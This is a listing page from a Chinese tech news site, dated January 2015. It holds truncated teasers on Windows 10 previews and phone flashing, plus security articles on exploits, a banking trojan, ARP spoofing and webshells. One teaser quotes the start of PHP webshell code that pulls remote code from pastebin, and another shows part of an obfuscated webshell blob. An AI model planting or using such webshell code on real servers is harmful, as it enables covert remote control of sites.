您的位置:首頁 > 菜鳥學(xué)院 > 資訊列表

  • Win10預(yù)覽版9926到底更新了什么?
    Win10預(yù)覽版9926到底更新了什么?

    我們一起來看看微軟官方博客帶來的相關(guān)新特性說明,翻譯刊發(fā)如下:1、桌面版微軟小娜Cortana全新Win10預(yù)覽版9926,正式集成了微軟小娜Cortana語音助手。可以通過其搜索電腦中的文件、信息或是聯(lián)網(wǎng)搜索某些你關(guān)心的問題。小娜Cortana將幫助你搜索Win10應(yīng)用、設(shè)置,

    來源:互聯(lián)網(wǎng) 時(shí)間:2015-01-24 閱讀次數(shù):4716 

  • 用U盤安裝Win10系統(tǒng)圖文步驟方法教程
    用U盤安裝Win10系統(tǒng)圖文步驟方法教程

    Win10技術(shù)預(yù)覽版9926現(xiàn)已公開提供下載,本文為新手朋友們?cè)斀庖幌鲁S玫挠脖P安裝Win10的方法。Win10技術(shù)預(yù)覽版是微軟發(fā)布的非正式版Win10系統(tǒng),目的是讓廣大用戶體驗(yàn)Win10全新功能,并希望獲得更多改進(jìn)建議,以便讓W(xué)in10正式版更加完善,因此在使用過程中不可避免

    來源:互聯(lián)網(wǎng) 時(shí)間:2015-01-24 閱讀次數(shù):8225 

  • 博士中關(guān)村買電腦被騙 七個(gè)博士沒搞定一個(gè)商戶
    博士中關(guān)村買電腦被騙 七個(gè)博士沒搞定一個(gè)商戶

    “沒想到像中關(guān)村這么有名的地方,竟然會(huì)發(fā)生這種事……”連博士在中關(guān)村買電腦也被騙了!本周二,李先生(化名)在中關(guān)村鼎好電子商城內(nèi)某商家處花6400元購買了某品牌的筆記本電腦,可回家一查發(fā)現(xiàn)該款電腦在網(wǎng)上的報(bào)價(jià)竟然只有3199元。第二天,他和6名博士好友

    來源:互聯(lián)網(wǎng) 時(shí)間:2015-01-24 閱讀次數(shù):809 

  • 怎么重置所有Win10/Win8.1/Win7文件夾視圖
    怎么重置所有Win10/Win8.1/Win7文件夾視圖

    1月23日消息,文件夾視圖是Win10/Win8.1/Win7等系統(tǒng)中調(diào)節(jié)文件夾中文件顯示的一項(xiàng)重要功能。我們對(duì)于不同文件夾中文件的顯示方式可能有不同要求,比如圖片文件夾可能以大圖標(biāo)顯示方式比較直觀,而文檔則要以詳細(xì)信息方式顯示便于查詢?墒请S著系統(tǒng)使用時(shí)間的變長

    來源:互聯(lián)網(wǎng) 時(shí)間:2015-01-23 閱讀次數(shù):1737 

  • 利用HTC One漏洞破解手機(jī)PIN密碼
    利用HTC One漏洞破解手機(jī)PIN密碼

    HTCOne手機(jī)運(yùn)行的是Android4.2.2、HBOOT1.54.0000,它存在一個(gè)名為Bootloader的漏洞。這個(gè)漏洞早在2014年2月份就報(bào)告給了HTC官方,并在次月就修復(fù)了該漏洞。在得到HTC官方同意后,我們現(xiàn)在就將整個(gè)漏洞利用測(cè)試過程發(fā)布出來。read_emmc命令在2011發(fā)布的HTCDesireZ

    來源:互聯(lián)網(wǎng) 時(shí)間:2015-01-23 閱讀次數(shù):3145 

  • 利用Siri竊取蘋果iPhone/iPad數(shù)據(jù)的方法
    利用Siri竊取蘋果iPhone/iPad數(shù)據(jù)的方法

    FreeBuf科普:什么是Siri?Siri是蘋果公司在其產(chǎn)品iPhone4S,iPadAir及以上版本手機(jī)上應(yīng)用的一項(xiàng)語音控制功能。Siri可以令iPhone4S及以上(iPadAir)變身為一臺(tái)智能化機(jī)器人,利用Siri用戶可以通過手機(jī)讀短信、介紹餐廳、詢問天氣、語音設(shè)置鬧鐘等。Siri可以支持

    來源:互聯(lián)網(wǎng) 時(shí)間:2015-01-23 閱讀次數(shù):1356 

  • 使用調(diào)試器對(duì)安卓APP進(jìn)行安全測(cè)試
    使用調(diào)試器對(duì)安卓APP進(jìn)行安全測(cè)試

    1、所需工具下面列舉了本次攻擊演示所需要的所有工具:Windows/MacOSX/LinuxJava(推薦1.7版本)IDE(Eclipse,IntelliJIDEA,AndroidStudio,三者任選其一)AndroidSDK(https://developer.android.com/sdk/index.html?hl=i)APKTool(https://code.google.com/p

    來源:互聯(lián)網(wǎng) 時(shí)間:2015-01-23 閱讀次數(shù):2667 

  • 更加瘦小的12寸MacBook Air來襲,可能只保留一個(gè)USB-C型接口
    更加瘦小的12寸MacBook Air來襲,可能只保留一個(gè)USB-C型接口

    據(jù)9to5Mac報(bào)道,蘋果今年發(fā)布的新款12英寸MacBookAir中,可能會(huì)去除全尺寸USB接口、MagSafe電源接口、Thunderbolt顯示屏接口和SD讀卡器,而改用單USB-C型接口。這款筆記本將比11寸的MacBookAir還薄大約四分之一英寸。它被視為2012年Retina屏推出后,蘋果筆記本最

    來源:互聯(lián)網(wǎng) 時(shí)間:2015-01-23 閱讀次數(shù):1654 

  • 深入解讀MS14-068漏洞:微軟精心策劃的后門?
    深入解讀MS14-068漏洞:微軟精心策劃的后門?

    0×0背景微軟(2014-11-18)發(fā)布了一個(gè)緊急補(bǔ)丁,修復(fù)了一個(gè)影響全部版本W(wǎng)indows服務(wù)器的嚴(yán)重漏洞。今天發(fā)布的MS14-068漏洞補(bǔ)丁用于解決MicrosoftWindowsKerberosKDC漏洞(CVE-2014-6324),該漏洞允許黑客提升任意普通用戶權(quán)限成為域管理員(DomainAdmin)身份。

    來源:互聯(lián)網(wǎng) 時(shí)間:2015-01-22 閱讀次數(shù):2113 

  • 華為mate7卡刷教程
    華為mate7卡刷教程

    --華為mate7卡刷步驟1.首先將下載來的*.zip刷機(jī)包解壓,刷機(jī)包主文件名為:UPDATE.APP,在dload文件夾下,我們將dload整個(gè)文件夾拷貝到手機(jī)內(nèi)(文件夾內(nèi)包含刷機(jī)包)如圖:2.確認(rèn)刷機(jī)包已經(jīng)放入dload文件夾下,然后將手機(jī)關(guān)機(jī);關(guān)機(jī)狀態(tài)下同時(shí)按拙音量上鍵】、【音量

    來源:互聯(lián)網(wǎng) 時(shí)間:2015-01-22 閱讀次數(shù):1332 

  • 揭秘網(wǎng)銀大盜ZeuS的最新變種銀行木馬Chthonic
    揭秘網(wǎng)銀大盜ZeuS的最新變種銀行木馬Chthonic

    說到Zeus/Zbot,做安全多多少少都會(huì)有所了解。Zeus是對(duì)金融系統(tǒng)威脅最大的僵尸網(wǎng)絡(luò)之一,控制者借助僵尸程序竊取賬戶登錄信息和信用卡號(hào)碼。Zbot往往通過垃圾郵件來傳播,中招的會(huì)下載一個(gè)程序,這個(gè)程序會(huì)控制網(wǎng)銀,偷取信息。近期卡巴斯基實(shí)驗(yàn)室發(fā)現(xiàn)了一款ZeuS

    來源:互聯(lián)網(wǎng) 時(shí)間:2015-01-22 閱讀次數(shù):1924 

  • 技術(shù)分析:智能硬件蠕蟲威脅互聯(lián)網(wǎng)安全
    技術(shù)分析:智能硬件蠕蟲威脅互聯(lián)網(wǎng)安全

    引用:前日起(12月10日)全球互聯(lián)網(wǎng)范圍DNS流量異常。云堤團(tuán)隊(duì)(DamDDoS)迅速參與分析處置。本次事件攻擊自12月10日凌晨起至今仍在持續(xù),為近年來持續(xù)時(shí)間最長的DNSDDoS攻擊,目前已監(jiān)測(cè)到的攻擊最大流量近1億Qps(約合76.38Gbps)跟蹤:12月10日,DNS異常故障時(shí)

    來源:互聯(lián)網(wǎng) 時(shí)間:2015-01-22 閱讀次數(shù):1258 

  • Arp欺騙原理及Android環(huán)境下的檢測(cè)方法
    Arp欺騙原理及Android環(huán)境下的檢測(cè)方法

    測(cè)試環(huán)境說明網(wǎng)關(guān):IP:172.20.150.1mac:24050FCE53靶機(jī)(手機(jī)):IP:172.20.150.20mac:000822D806D2攻擊主機(jī)(虛擬機(jī)):IP:172.20.150.2mac:6C40089A1F16Wifi接入點(diǎn)(360免費(fèi)wifi):BSSID:24050FCE53(就是網(wǎng)關(guān)的mac),SSID:private(wifi名稱)攻擊場(chǎng)

    來源:互聯(lián)網(wǎng) 時(shí)間:2015-01-22 閱讀次數(shù):1586 

  • 關(guān)于免殺一句話木馬的解密還原
    關(guān)于免殺一句話木馬的解密還原

    一次巡查服務(wù)器的時(shí)候,發(fā)現(xiàn)網(wǎng)站存在漏洞,并已被植入后門。因?yàn)榉⻊?wù)器有安全狗,由此斷定后門代碼是免殺的。首先我們看看加密的源碼其中加色部分$drx.$ydd.$hq.$qvz按照排列依次拼接“CiRoaCAgc9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIigc4icgcCIuImwiLiJhgcIi4i

    來源:互聯(lián)網(wǎng) 時(shí)間:2015-01-21 閱讀次數(shù):2993 

  • 關(guān)于webshell的思路 - pastebin
    關(guān)于webshell的思路 - pastebin

    這兩天某國外黑客寫了一篇文章關(guān)于他發(fā)現(xiàn)的一種webshell中使用的手法,大體說說思路,原文就不翻譯了,我懶。簡單來說就是通過一個(gè)很簡單的代碼遠(yuǎn)程通過pastebin下載代碼并且執(zhí)行。if(array_keys($_GET)[0]=='up'){$content=file_get_contents('http://pastebin.c

    來源:互聯(lián)網(wǎng) 時(shí)間:2015-01-21 閱讀次數(shù):1683 

掃二維碼進(jìn)入好特網(wǎng)手機(jī)版本!

掃二維碼進(jìn)入好特網(wǎng)微信公眾號(hào)!

本站所有軟件,都由網(wǎng)友上傳,如有侵犯你的版權(quán),請(qǐng)發(fā)郵件[email protected]

湘ICP備2022002427號(hào)-10 湘公網(wǎng)安備:43070202000427號(hào)© 2013~2025 haote.com 好特網(wǎng)